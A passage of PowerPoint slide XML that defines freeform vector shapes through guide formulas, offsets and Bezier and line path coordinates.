                    <a:gd name="T22" fmla="*/ 241 w 302"/>
                    <a:gd name="T23" fmla="*/ 96 h 3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02" h="333">
                      <a:moveTo>
                        <a:pt x="241" y="96"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="191" y="30"/>
                        <a:pt x="117" y="0"/>
                        <a:pt x="66" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="21"/>
                        <a:pt x="66" y="21"/>
                        <a:pt x="66" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="34"/>
                        <a:pt x="17" y="34"/>
                        <a:pt x="17" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="55"/>
                        <a:pt x="26" y="55"/>
                        <a:pt x="26" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="100"/>
                        <a:pt x="11" y="174"/>
                        <a:pt x="58" y="236"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82" y="268"/>
                        <a:pt x="112" y="292"/>
                        <a:pt x="143" y="305"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="333"/>
                        <a:pt x="156" y="333"/>
                        <a:pt x="156" y="333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32" y="312"/>
                        <a:pt x="242" y="308"/>
                        <a:pt x="252" y="301"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="302" y="262"/>
                        <a:pt x="298" y="171"/>
                        <a:pt x="241" y="96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0" name="Freeform 876"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4336" y="718"/>
                  <a:ext cx="349" cy="395"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 255 w 306"/>
                    <a:gd name="T1" fmla="*/ 308 h 346"/>
                    <a:gd name="T2" fmla="*/ 61 w 306"/>
                    <a:gd name="T3" fmla="*/ 243 h 346"/>
                    <a:gd name="T4" fmla="*/ 51 w 306"/>
                    <a:gd name="T5" fmla="*/ 38 h 346"/>
                    <a:gd name="T6" fmla="*/ 244 w 306"/>
                    <a:gd name="T7" fmla="*/ 103 h 346"/>
                    <a:gd name="T8" fmla="*/ 255 w 306"/>
                    <a:gd name="T9" fmla="*/ 308 h 3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6" h="346">
                      <a:moveTo>
                        <a:pt x="255" y="308"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="205" y="346"/>
                        <a:pt x="118" y="317"/>
                        <a:pt x="61" y="243"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="168"/>
                        <a:pt x="0" y="77"/>
                        <a:pt x="51" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="101" y="0"/>
                        <a:pt x="188" y="29"/>
                        <a:pt x="244" y="103"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="301" y="178"/>
                        <a:pt x="306" y="269"/>
                        <a:pt x="255" y="308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877"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4405" y="796"/>
                  <a:ext cx="212" cy="240"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 155 w 186"/>
                    <a:gd name="T1" fmla="*/ 187 h 210"/>
                    <a:gd name="T2" fmla="*/ 37 w 186"/>
                    <a:gd name="T3" fmla="*/ 147 h 210"/>
                    <a:gd name="T4" fmla="*/ 31 w 186"/>
                    <a:gd name="T5" fmla="*/ 23 h 210"/>
                    <a:gd name="T6" fmla="*/ 149 w 186"/>
                    <a:gd name="T7" fmla="*/ 63 h 210"/>
                    <a:gd name="T8" fmla="*/ 155 w 186"/>
                    <a:gd name="T9" fmla="*/ 187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6" h="210">
                      <a:moveTo>
                        <a:pt x="155" y="187"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="124" y="210"/>
                        <a:pt x="71" y="193"/>
                        <a:pt x="37" y="147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="102"/>
                        <a:pt x="0" y="47"/>
                        <a:pt x="31" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="0"/>
                        <a:pt x="114" y="17"/>
                        <a:pt x="149" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="183" y="108"/>
                        <a:pt x="186" y="164"/>
                        <a:pt x="155" y="18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878"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4784" y="804"/>
                  <a:ext cx="344" cy="379"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 241 w 302"/>
                    <a:gd name="T1" fmla="*/ 96 h 332"/>
                    <a:gd name="T2" fmla="*/ 66 w 302"/>
                    <a:gd name="T3" fmla="*/ 21 h 332"/>
                    <a:gd name="T4" fmla="*/ 66 w 302"/>
                    <a:gd name="T5" fmla="*/ 21 h 332"/>
                    <a:gd name="T6" fmla="*/ 17 w 302"/>
                    <a:gd name="T7" fmla="*/ 33 h 332"/>
                    <a:gd name="T8" fmla="*/ 27 w 302"/>
                    <a:gd name="T9" fmla="*/ 55 h 332"/>
                    <a:gd name="T10" fmla="*/ 58 w 302"/>
                    <a:gd name="T11" fmla="*/ 235 h 332"/>
                    <a:gd name="T12" fmla="*/ 143 w 302"/>
                    <a:gd name="T13" fmla="*/ 305 h 332"/>
                    <a:gd name="T14" fmla="*/ 156 w 302"/>
                    <a:gd name="T15" fmla="*/ 332 h 332"/>
                    <a:gd name="T16" fmla="*/ 221 w 302"/>
                    <a:gd name="T17" fmla="*/ 315 h 332"/>
                    <a:gd name="T18" fmla="*/ 221 w 302"/>
                    <a:gd name="T19" fmla="*/ 315 h 332"/>
                    <a:gd name="T20" fmla="*/ 252 w 302"/>
                    <a:gd name="T21" fmla="*/ 300 h 332"/>
                    <a:gd name="T22" fmla="*/ 241 w 302"/>
                    <a:gd name="T23" fmla="*/ 96 h 3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02" h="332">
                      <a:moveTo>
                        <a:pt x="241" y="96"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="191" y="30"/>
                        <a:pt x="117" y="0"/>
                        <a:pt x="66" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="21"/>
                        <a:pt x="66" y="21"/>
                        <a:pt x="66" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="33"/>
                        <a:pt x="17" y="33"/>
                        <a:pt x="17" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="55"/>
                        <a:pt x="27" y="55"/>
                        <a:pt x="27" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="100"/>
                        <a:pt x="11" y="173"/>
                        <a:pt x="58" y="235"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82" y="268"/>
                        <a:pt x="112" y="291"/>
                        <a:pt x="143" y="305"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="332"/>
                        <a:pt x="156" y="332"/>
                        <a:pt x="156" y="332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32" y="312"/>
                        <a:pt x="243" y="307"/>
                        <a:pt x="252" y="300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="302" y="262"/>
                        <a:pt x="298" y="170"/>
                        <a:pt x="241" y="96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879"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4707" y="815"/>
                  <a:ext cx="350" cy="396"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 255 w 306"/>
                    <a:gd name="T1" fmla="*/ 307 h 346"/>
                    <a:gd name="T2" fmla="*/ 61 w 306"/>
                    <a:gd name="T3" fmla="*/ 242 h 346"/>
                    <a:gd name="T4" fmla="*/ 51 w 306"/>
                    <a:gd name="T5" fmla="*/ 38 h 346"/>
                    <a:gd name="T6" fmla="*/ 245 w 306"/>
                    <a:gd name="T7" fmla="*/ 103 h 346"/>
                    <a:gd name="T8" fmla="*/ 255 w 306"/>
                    <a:gd name="T9" fmla="*/ 307 h 3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6" h="346">
                      <a:moveTo>
                        <a:pt x="255" y="307"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="205" y="346"/>
                        <a:pt x="118" y="317"/>
                        <a:pt x="61" y="242"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="168"/>
                        <a:pt x="0" y="77"/>
                        <a:pt x="51" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="101" y="0"/>
                        <a:pt x="188" y="29"/>
                        <a:pt x="245" y="103"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="301" y="177"/>
                        <a:pt x="306" y="269"/>
                        <a:pt x="255" y="307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4" name="Freeform 880"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4776" y="892"/>
                  <a:ext cx="212" cy="241"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 155 w 186"/>
                    <a:gd name="T1" fmla="*/ 188 h 211"/>
                    <a:gd name="T2" fmla="*/ 37 w 186"/>
                    <a:gd name="T3" fmla="*/ 148 h 211"/>
                    <a:gd name="T4" fmla="*/ 31 w 186"/>
                    <a:gd name="T5" fmla="*/ 24 h 211"/>
                    <a:gd name="T6" fmla="*/ 149 w 186"/>
                    <a:gd name="T7" fmla="*/ 63 h 211"/>
                    <a:gd name="T8" fmla="*/ 155 w 186"/>
                    <a:gd name="T9" fmla="*/ 188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6" h="211">
                      <a:moveTo>
                        <a:pt x="155" y="188"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="124" y="211"/>
                        <a:pt x="71" y="193"/>
                        <a:pt x="37" y="148"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="103"/>
                        <a:pt x="0" y="47"/>
                        <a:pt x="31" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="0"/>
                        <a:pt x="114" y="18"/>
                        <a:pt x="149" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="183" y="109"/>
                        <a:pt x="186" y="164"/>
                        <a:pt x="155" y="18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5" name="Freeform 881"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5156" y="828"/>
                  <a:ext cx="841" cy="321"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1739"/>
                    <a:gd name="T1" fmla="*/ 0 h 664"/>
                    <a:gd name="T2" fmla="*/ 0 w 1739"/>
                    <a:gd name="T3" fmla="*/ 198 h 664"/>
                    <a:gd name="T4" fmla="*/ 1739 w 1739"/>
                    <a:gd name="T5" fmla="*/ 664 h 664"/>
                    <a:gd name="T6" fmla="*/ 1739 w 1739"/>
                    <a:gd name="T7" fmla="*/ 465 h 664"/>
                    <a:gd name="T8" fmla="*/ 0 w 1739"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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39" h="664">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="198"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1739" y="664"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1739" y="46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882"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5156" y="711"/>
                  <a:ext cx="1273" cy="342"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1739 w 2634"/>
                    <a:gd name="T1" fmla="*/ 224 h 706"/>
                    <a:gd name="T2" fmla="*/ 898 w 2634"/>
                    <a:gd name="T3" fmla="*/ 0 h 706"/>
                    <a:gd name="T4" fmla="*/ 0 w 2634"/>
                    <a:gd name="T5" fmla="*/ 241 h 706"/>
                    <a:gd name="T6" fmla="*/ 843 w 2634"/>
                    <a:gd name="T7" fmla="*/ 465 h 706"/>
                    <a:gd name="T8" fmla="*/ 843 w 2634"/>
                    <a:gd name="T9" fmla="*/ 465 h 706"/>
                    <a:gd name="T10" fmla="*/ 1739 w 2634"/>
                    <a:gd name="T11" fmla="*/ 706 h 706"/>
                    <a:gd name="T12" fmla="*/ 2634 w 2634"/>
                    <a:gd name="T13" fmla="*/ 465 h 706"/>
                    <a:gd name="T14" fmla="*/ 1739 w 2634"/>
                    <a:gd name="T15" fmla="*/ 224 h 7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634" h="706">
                      <a:moveTo>
                        <a:pt x="1739" y="224"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="898" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="843" y="465"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="843" y="465"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1739" y="706"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2634" y="465"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1739" y="22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883"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5780" y="967"/>
                  <a:ext cx="944" cy="254"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 609 w 1953"/>
                    <a:gd name="T1" fmla="*/ 524 h 524"/>
                    <a:gd name="T2" fmla="*/ 0 w 1953"/>
                    <a:gd name="T3" fmla="*/ 361 h 524"/>
                    <a:gd name="T4" fmla="*/ 1344 w 1953"/>
                    <a:gd name="T5" fmla="*/ 0 h 524"/>
                    <a:gd name="T6" fmla="*/ 1953 w 1953"/>
                    <a:gd name="T7" fmla="*/ 156 h 524"/>
                    <a:gd name="T8" fmla="*/ 609 w 1953"/>
                    <a:gd name="T9" fmla="*/ 524 h 5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53" h="524">
                      <a:moveTo>
                        <a:pt x="609" y="524"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="361"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1953" y="156"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="609" y="52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884"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6074" y="1043"/>
                  <a:ext cx="650" cy="218"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1344"/>
                    <a:gd name="T1" fmla="*/ 451 h 451"/>
                    <a:gd name="T2" fmla="*/ 0 w 1344"/>
                    <a:gd name="T3" fmla="*/ 368 h 451"/>
                    <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                    <a:gd name="T5" fmla="*/ 0 h 451"/>
                    <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                    <a:gd name="T7" fmla="*/ 83 h 451"/>
                    <a:gd name="T8" fmla="*/ 0 w 1344"/>
                    <a:gd name="T9" fmla="*/ 451 h 4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4" h="451">
                      <a:moveTo>
                        <a:pt x="0" y="451"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="45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885"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5191" y="931"/>
                  <a:ext cx="82" cy="118"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 170"/>
                    <a:gd name="T1" fmla="*/ 244 h 244"/>
                    <a:gd name="T2" fmla="*/ 170 w 170"/>
                    <a:gd name="T3" fmla="*/ 199 h 244"/>
                    <a:gd name="T4" fmla="*/ 170 w 170"/>
                    <a:gd name="T5" fmla="*/ 0 h 244"/>
                    <a:gd name="T6" fmla="*/ 0 w 170"/>
                    <a:gd name="T7" fmla="*/ 45 h 244"/>
                    <a:gd name="T8" fmla="*/ 0 w 170"/>
                    <a:gd name="T9" fmla="*/ 244 h 2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0" h="244">
                      <a:moveTo>
                        <a:pt x="0" y="244"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="170" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="170" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="24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886"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5780" y="1111"/>
                  <a:ext cx="294" cy="175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 609"/>
                    <a:gd name="T1" fmla="*/ 0 h 361"/>
                    <a:gd name="T2" fmla="*/ 0 w 609"/>
                    <a:gd name="T3" fmla="*/ 198 h 361"/>
                    <a:gd name="T4" fmla="*/ 609 w 609"/>
                    <a:gd name="T5" fmla="*/ 361 h 361"/>
                    <a:gd name="T6" fmla="*/ 609 w 609"/>
                    <a:gd name="T7" fmla="*/ 163 h 361"/>
                    <a:gd name="T8" fmla="*/ 0 w 609"/>
                    <a:gd name="T9" fmla="*/ 0 h 3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9" h="361">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="198"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="609" y="361"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="609" y="1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887"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5486" y="1033"/>
                  <a:ext cx="294" cy="174"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 607"/>
                    <a:gd name="T1" fmla="*/ 0 h 361"/>
                    <a:gd name="T2" fmla="*/ 0 w 607"/>
                    <a:gd name="T3" fmla="*/ 198 h 361"/>
                    <a:gd name="T4" fmla="*/ 607 w 607"/>
                    <a:gd name="T5" fmla="*/ 361 h 361"/>
                    <a:gd name="T6" fmla="*/ 607 w 607"/>
                    <a:gd name="T7" fmla="*/ 163 h 361"/>
                    <a:gd name="T8" fmla="*/ 0 w 607"/>
                    <a:gd name="T9" fmla="*/ 0 h 3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7" h="361">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="198"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="607" y="361"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="607" y="1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" name="Freeform 888"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5191" y="952"/>
                  <a:ext cx="295" cy="176"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 610"/>
                    <a:gd name="T1" fmla="*/ 0 h 364"/>
                    <a:gd name="T2" fmla="*/ 0 w 610"/>
                    <a:gd name="T3" fmla="*/ 199 h 364"/>
                    <a:gd name="T4" fmla="*/ 610 w 610"/>
                    <a:gd name="T5" fmla="*/ 364 h 364"/>
                    <a:gd name="T6" fmla="*/ 610 w 610"/>
                    <a:gd name="T7" fmla="*/ 166 h 364"/>
                    <a:gd name="T8" fmla="*/ 0 w 610"/>
                    <a:gd name="T9" fmla="*/ 0 h 3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10" h="364">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="610" y="364"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="610" y="16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 889"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6074" y="1167"/>
                  <a:ext cx="84" cy="119"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 173"/>
                    <a:gd name="T1" fmla="*/ 246 h 246"/>
                    <a:gd name="T2" fmla="*/ 173 w 173"/>
                    <a:gd name="T3" fmla="*/ 199 h 246"/>
                    <a:gd name="T4" fmla="*/ 173 w 173"/>
                    <a:gd name="T5" fmla="*/ 0 h 246"/>
                    <a:gd name="T6" fmla="*/ 0 w 173"/>
                    <a:gd name="T7" fmla="*/ 48 h 246"/>
                    <a:gd name="T8" fmla="*/ 0 w 173"/>
                    <a:gd name="T9" fmla="*/ 246 h 2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3" h="246">
                      <a:moveTo>
                        <a:pt x="0" y="246"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="173" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="48"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="24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890"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5069" y="-480"/>
                  <a:ext cx="1959" cy="1390"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4051"/>
                    <a:gd name="T1" fmla="*/ 1772 h 2875"/>
                    <a:gd name="T2" fmla="*/ 4051 w 4051"/>
                    <a:gd name="T3" fmla="*/ 2875 h 2875"/>
                    <a:gd name="T4" fmla="*/ 4051 w 4051"/>
                    <a:gd name="T5" fmla="*/ 1101 h 2875"/>
                    <a:gd name="T6" fmla="*/ 0 w 4051"/>
                    <a:gd name="T7" fmla="*/ 0 h 2875"/>
                    <a:gd name="T8" fmla="*/ 0 w 4051"/>
                    <a:gd name="T9" fmla="*/ 1772 h 28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51" h="2875">
                      <a:moveTo>
                        <a:pt x="0" y="1772"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4051" y="2875"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4051" y="1101"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="177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891"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4200" y="-480"/>
                  <a:ext cx="869" cy="1091"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1798"/>
                    <a:gd name="T1" fmla="*/ 2256 h 2256"/>
                    <a:gd name="T2" fmla="*/ 1798 w 1798"/>
                    <a:gd name="T3" fmla="*/ 1772 h 2256"/>
                    <a:gd name="T4" fmla="*/ 1798 w 1798"/>
                    <a:gd name="T5" fmla="*/ 0 h 2256"/>
                    <a:gd name="T6" fmla="*/ 0 w 1798"/>
                    <a:gd name="T7" fmla="*/ 482 h 2256"/>
                    <a:gd name="T8" fmla="*/ 0 w 1798"/>
                    <a:gd name="T9" fmla="*/ 2256 h 22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98" h="2256">
                      <a:moveTo>
                        <a:pt x="0" y="2256"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1798" y="1772"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1798" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="482"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="225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 892"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4200" y="-247"/>
                  <a:ext cx="1959" cy="1390"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4051"/>
                    <a:gd name="T1" fmla="*/ 1774 h 2875"/>
                    <a:gd name="T2" fmla="*/ 4051 w 4051"/>
                    <a:gd name="T3" fmla="*/ 2875 h 2875"/>
                    <a:gd name="T4" fmla="*/ 4051 w 4051"/>
                    <a:gd name="T5" fmla="*/ 1101 h 2875"/>
                    <a:gd name="T6" fmla="*/ 0 w 4051"/>
                    <a:gd name="T7" fmla="*/ 0 h 2875"/>
                    <a:gd name="T8" fmla="*/ 0 w 4051"/>
                    <a:gd name="T9" fmla="*/ 1774 h 28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51" h="2875">
                      <a:moveTo>
                        <a:pt x="0" y="1774"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4051" y="2875"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4051" y="1101"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="177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893"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6159" y="52"/>
                  <a:ext cx="869" cy="1091"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1798"/>
                    <a:gd name="T1" fmla="*/ 2256 h 2256"/>
                    <a:gd name="T2" fmla="*/ 1798 w 1798"/>
                    <a:gd name="T3" fmla="*/ 1774 h 2256"/>
                    <a:gd name="T4" fmla="*/ 1798 w 1798"/>
                    <a:gd name="T5" fmla="*/ 0 h 2256"/>
                    <a:gd name="T6" fmla="*/ 0 w 1798"/>
                    <a:gd name="T7" fmla="*/ 482 h 2256"/>
                    <a:gd name="T8" fmla="*/ 0 w 1798"/>
                    <a:gd name="T9" fmla="*/ 2256 h 22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98" h="2256">
                      <a:moveTo>
                        <a:pt x="0" y="2256"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1798" y="1774"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1798" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="482"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="225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894"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4200" y="-159"/>
                  <a:ext cx="1959" cy="617"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4051"/>
                    <a:gd name="T1" fmla="*/ 175 h 1275"/>
                    <a:gd name="T2" fmla="*/ 4051 w 4051"/>
                    <a:gd name="T3" fmla="*/ 1275 h 1275"/>
                    <a:gd name="T4" fmla="*/ 4051 w 4051"/>
                    <a:gd name="T5" fmla="*/ 1103 h 1275"/>
                    <a:gd name="T6" fmla="*/ 0 w 4051"/>
                    <a:gd name="T7" fmla="*/ 0 h 1275"/>
                    <a:gd name="T8" fmla="*/ 0 w 4051"/>
                    <a:gd name="T9" fmla="*/ 175 h 1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51" h="1275">
                      <a:moveTo>
                        <a:pt x="0" y="175"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4051" y="1275"/>
                      </a:lnTo>
                      <a:lnTo>
